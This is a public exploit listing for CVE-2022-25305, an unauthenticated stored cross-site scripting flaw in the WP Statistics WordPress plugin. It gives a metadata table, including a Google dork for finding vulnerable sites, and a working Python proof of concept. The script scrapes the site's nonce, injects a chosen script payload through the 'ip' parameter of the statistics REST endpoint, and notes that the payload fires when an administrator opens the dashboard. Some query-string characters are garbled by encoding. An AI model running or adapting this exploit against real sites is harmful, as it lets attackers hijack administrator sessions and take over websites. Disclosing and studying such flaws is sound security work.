| Exploit Title | WordPress Plugin WP Statistics >= 13.1.5 - Unauthenticated Stored Cross-Site Scripting |
| Exploit Author | Muhammad Zeeshan (Xib3rR4dAr) |
| Date | February 13, 2022 |
| Plugin Link | WP-Statistics |
| Plugin Active Installations | 600,000+ |
| Version | 13.1.5 (Latest) |
| Tested on | Wordpress 5.9 |
| Vulnerable Endpoint | /wp-json/wp-statistics/v2/hit |
| Vulnerable File | /wp-content/plugins/wp-statistics/includes/class-wp-statistics-ip.php and others |
| Vulnerable Parameters | ip |
| Google Dork | inurl:/wp-content/plugins/wp-statistics |
| CVE | CVE-2022-25305 |
unauthenticated_stored_xss_platform_poc.py
import requests, re, json, urllib.parse
wpurl = input('\nWordPress URL: ')
payload = input('\nPayload: ')
wp_session = requests.session()
wp = wp_session.get(wpurl)
wp_nonce = re.search(r'_wpnonce=(.*?)&wp_statistics_hit', wp.text).group(1)
headers = {"User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 12_2_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15"}
payload = urllib.parse.quote_plus(payload)
exploit = f'/wp-json/wp-statistics/v2/hit?_=11&_wpnonce={wp_nonce}&wp_statistics_hit_rest=&browser=Chrome&platform=&version=&referred=&ip={payload}&exclusion_match=no&exclusion_reason&ua=Something&track_all=1×tamp=11¤t_page_type=home¤t_page_id=0&search_query&page_uri=/&user_id=0'
exploit_url = wpurl+exploit
print(f'\nSending XSS payload: {exploit_url}')
wp = wp_session.get(exploit_url, headers=headers)
data = wp.json()
print("\nResponse: \n" + json.dumps(data, sort_keys=True, indent=4))
print(f'\nXSS will trigger when admin visits WP Statistics Dashboard at {wpurl}/wp-admin/admin.php?page=wps_overview_page or other pages.')